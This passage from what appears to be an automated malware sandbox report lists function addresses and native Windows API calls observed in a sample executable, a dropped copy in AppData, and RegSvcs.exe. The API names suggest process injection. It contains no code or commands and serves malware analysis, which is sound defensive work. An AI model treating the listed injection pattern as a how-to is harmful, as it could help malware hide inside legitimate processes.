            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0042BE33 NtClose,6_2_0042BE33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522B60 NtClose,LdrInitializeThunk,6_2_01522B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01522DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01522C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015235C0 NtCreateMutant,LdrInitializeThunk,6_2_015235C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01524340 NtSetContextThread,6_2_01524340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01524650 NtSuspendThread,6_2_01524650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522BF0 NtAllocateVirtualMemory,6_2_01522BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522BE0 NtQueryValueKey,6_2_01522BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522B80 NtQueryInformationFile,6_2_01522B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522BA0 NtEnumerateValueKey,6_2_01522BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522AD0 NtReadFile,6_2_01522AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522AF0 NtWriteFile,6_2_01522AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522AB0 NtWaitForSingleObject,6_2_01522AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522D10 NtMapViewOfSection,6_2_01522D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522D00 NtSetInformationFile,6_2_01522D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522D30 NtUnmapViewOfSection,6_2_01522D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522DD0 NtDelayExecution,6_2_01522DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522DB0 NtEnumerateKey,6_2_01522DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522C60 NtCreateKey,6_2_01522C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522C00 NtQueryInformationProcess,6_2_01522C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522CC0 NtQueryVirtualMemory,6_2_01522CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522CF0 NtOpenProcess,6_2_01522CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522CA0 NtQueryInformationToken,6_2_01522CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522F60 NtCreateProcessEx,6_2_01522F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522F30 NtCreateSection,6_2_01522F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522FE0 NtCreateFile,6_2_01522FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522F90 NtProtectVirtualMemory,6_2_01522F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522FB0 NtResumeThread,6_2_01522FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522FA0 NtQuerySection,6_2_01522FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522E30 NtWriteVirtualMemory,6_2_01522E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522EE0 NtQueueApcThread,6_2_01522EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522E80 NtReadVirtualMemory,6_2_01522E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522EA0 NtAdjustPrivilegesToken,6_2_01522EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01523010 NtOpenDirectoryObject,6_2_01523010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01523090 NtSetValueKey,6_2_01523090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015239B0 NtGetContextThread,6_2_015239B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01523D70 NtOpenThread,6_2_01523D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01523D10 NtOpenProcessToken,6_2_01523D10
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_03404B000_2_03404B00
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_0340D3040_2_0340D304
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081200400_2_08120040
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_0812D0180_2_0812D018
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081200060_2_08120006
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081230390_2_08123039
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081230480_2_08123048
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081250A00_2_081250A0
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_0812C2780_2_0812C278
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_0812C2680_2_0812C268
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_08122C100_2_08122C10
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_08125C100_2_08125C10
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_08122C090_2_08122C09
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_08125C200_2_08125C20
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081246F00_2_081246F0
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081246E00_2_081246E0
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_063C17F90_2_063C17F9
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_063C08940_2_063C0894
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004010C96_2_004010C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004010D06_2_004010D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004028E06_2_004028E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004031806_2_00403180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00416A036_2_00416A03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0042E4836_2_0042E483
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004024826_2_00402482
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040FCAA6_2_0040FCAA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040FCB36_2_0040FCB3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004026406_2_00402640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004026316_2_00402631
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040FED36_2_0040FED3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040DF536_2_0040DF53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004047946_2_00404794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015781586_2_01578158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158A1186_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E01006_2_014E0100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A81CC6_2_015A81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B01AA6_2_015B01AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015820006_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AA3526_2_015AA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B03E66_2_015B03E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE3F06_2_014FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015902746_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015702C06_2_015702C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F05356_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B05916_2_015B0591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A24466_2_015A2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015944206_2_01594420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159E4F66_2_0159E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015147506_2_01514750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F07706_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EC7C06_2_014EC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150C6E06_2_0150C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015069626_2_01506962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A06_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015BA9A66_2_015BA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F28406_2_014F2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FA8406_2_014FA840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E8F06_2_0151E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D68B86_2_014D68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AAB406_2_015AAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A6BD76_2_015A6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA806_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158CD1F6_2_0158CD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FAD006_2_014FAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EADE06_2_014EADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01508DBF6_2_01508DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0C006_2_014F0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0CF26_2_014E0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590CB56_2_01590CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01564F406_2_01564F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01510F306_2_01510F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01592F306_2_01592F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01532F286_2_01532F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E2FC86_2_014E2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156EFA06_2_0156EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0E596_2_014F0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AEE266_2_015AEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AEEDB6_2_015AEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502E906_2_01502E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015ACE936_2_015ACE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015BB16B6_2_015BB16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152516C6_2_0152516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DF1726_2_014DF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FB1B06_2_014FB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F70C06_2_014F70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159F0CC6_2_0159F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A70E96_2_015A70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AF0E06_2_015AF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DD34C6_2_014DD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A132D6_2_015A132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0153739A6_2_0153739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150B2C06_2_0150B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150D2F06_2_0150D2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015912ED6_2_015912ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F52A06_2_014F52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A75716_2_015A7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158D5B06_2_0158D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E14606_2_014E1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AF43F6_2_015AF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AF7B06_2_015AF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A16CC6_2_015A16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150B9506_2_0150B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F99506_2_014F9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015859106_2_01585910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155D8006_2_0155D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F38E06_2_014F38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AFB766_2_015AFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01565BF06_2_01565BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152DBF96_2_0152DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150FB806_2_0150FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AFA496_2_015AFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A7A466_2_015A7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01563A6C6_2_01563A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159DAC66_2_0159DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01535AA06_2_01535AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158DAAC6_2_0158DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01591AA36_2_01591AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A1D5A6_2_015A1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F3D406_2_014F3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A7D736_2_015A7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150FDC06_2_0150FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01569C326_2_01569C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AFCF26_2_015AFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AFF096_2_015AFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F1F926_2_014F1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AFFB16_2_015AFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F9EB06_2_014F9EB0
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_02F24B007_2_02F24B00
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_02F2D3047_2_02F2D304
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB00407_2_07BB0040
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB46F07_2_07BB46F0
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB46E07_2_07BB46E0
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BBB5D87_2_07BBB5D8
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BBB5C97_2_07BBB5C9
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB5C207_2_07BB5C20
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB2C107_2_07BB2C10
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB5C107_2_07BB5C10
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BBC3787_2_07BBC378
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB50A07_2_07BB50A0
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB00067_2_07BB0006
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BB30487_2_07BB3048
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_064117F97_2_064117F9
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_064108947_2_06410894
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D010013_2_010D0100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111516C13_2_0111516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010CF17213_2_010CF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EB1B013_2_010EB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010CD34C13_2_010CD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E33F313_2_010E33F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E52A013_2_010E52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FB2C013_2_010FB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_011602C013_2_011602C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FD2F013_2_010FD2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E053513_2_010E0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D146013_2_010D1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E349713_2_010E3497
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EB73013_2_010EB730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0110475013_2_01104750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E077013_2_010E0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010DC7C013_2_010DC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FC6E013_2_010FC6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E995013_2_010E9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FB95013_2_010FB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F696213_2_010F6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E599013_2_010E5990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E29A013_2_010E29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0114D80013_2_0114D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E284013_2_010E2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EA84013_2_010EA840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111889013_2_01118890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010C68B813_2_010C68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0110E8F013_2_0110E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E38E013_2_010E38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FFB8013_2_010FFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01155BF013_2_01155BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111DBF913_2_0111DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01153A6C13_2_01153A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010DEA8013_2_010DEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EAD0013_2_010EAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E3D4013_2_010E3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010EED7A13_2_010EED7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F8DBF13_2_010F8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E8DC013_2_010E8DC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010FFDC013_2_010FFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010DADE013_2_010DADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E0C0013_2_010E0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01159C3213_2_01159C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010F9C2013_2_010F9C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D0CF213_2_010D0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01100F3013_2_01100F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01122F2813_2_01122F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01154F4013_2_01154F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010E1F9213_2_010E1F92
